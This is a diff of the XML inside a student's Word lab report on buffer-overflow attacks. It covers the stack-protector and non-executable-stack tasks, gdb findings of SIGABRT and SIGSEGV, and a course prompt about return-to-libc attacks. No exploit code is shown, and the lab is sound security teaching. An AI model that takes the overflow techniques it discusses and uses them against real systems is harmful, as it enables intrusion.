+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Complied </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>stack.c</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> and run the two program again</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5942AE25" wp14:editId="5E55E16C">
+            <wp:extent cx="5274310" cy="1094740"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
+            <wp:docPr id="23" name="图片 23"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId30"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5274310" cy="1094740"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>I</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>t seems the system detected the stack smashing and aborted immediately to avoid suffering the stack-overflow attack.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Let’s see in which step it happened</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, also by using </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>gdb</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F31D346" wp14:editId="17965E9A">
+            <wp:extent cx="4162425" cy="848045"/>
+            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+            <wp:docPr id="25" name="图片 25"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 8"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId31">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4181285" cy="851887"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0DAD8E18" wp14:editId="49232C86">
+            <wp:extent cx="4076700" cy="1285875"/>
+            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+            <wp:docPr id="26" name="图片 26"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 9"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId32">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4076700" cy="1285875"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>S</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>o it is aborted by __</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>kernel_</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>vsyscall</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) function in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>raise.c</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> before the first line in main. The signal type is SIGABRT.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="0070C0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="0070C0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>2.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="0070C0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>7</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="0070C0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="0070C0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>Task 6: Turn on the Non-executable Stack Protection</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Complied </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>stack.c</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> and run the two program again</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2376BF77" wp14:editId="2FBB603D">
+            <wp:extent cx="5274310" cy="852170"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
+            <wp:docPr id="24" name="图片 24"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId33"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5274310" cy="852170"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>I</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>t seems some segmentation fault occurred when we set the stack non-executable. Let’s see in which step it happened</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">also by using </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>gdb</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C1B8778" wp14:editId="56E83540">
+            <wp:extent cx="5274310" cy="2800350"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
+            <wp:docPr id="27" name="图片 27"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId34"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5274310" cy="2800350"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>The command in stack is not allowed to execute even</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> it is just a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>nop</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>before the first line in main</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>The signal type is SIG</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>SEGV</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="0070C0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="0070C0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>CS648: Write a detailed report about return-to-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="0070C0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>libc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="0070C0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> attack and connect it to what we have learned about buffer overflow attack. You will get an extra 10 points if you implement the attack.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+          <w:color w:val="0070C0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="single"/>
+        </w:rPr>
       </w:pPr>
     </w:p>
     <w:sectPr>
-      <w:headerReference w:type="even" r:id="rId27"/>
-      <w:headerReference w:type="default" r:id="rId28"/>
-      <w:footerReference w:type="even" r:id="rId29"/>
-      <w:footerReference w:type="default" r:id="rId30"/>
-      <w:headerReference w:type="first" r:id="rId31"/>
-      <w:footerReference w:type="first" r:id="rId32"/>
+      <w:headerReference w:type="even" r:id="rId35"/>
+      <w:headerReference w:type="default" r:id="rId36"/>
+      <w:footerReference w:type="even" r:id="rId37"/>
+      <w:footerReference w:type="default" r:id="rId38"/>
+      <w:headerReference w:type="first" r:id="rId39"/>
+      <w:footerReference w:type="first" r:id="rId40"/>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1440" w:right="1800" w:bottom="1440" w:left="1800" w:header="851" w:footer="992" w:gutter="0"/>
       <w:cols w:space="425"/>

--- a/Project_2_Report_Enze_Xu.docx
+++ b/Project_2_Report_Enze_Xu.docx
@@ -4016,7 +4016,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>y final version of “</w:t>
+        <w:t>y “</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -5778,7 +5778,23 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve"> To find </w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
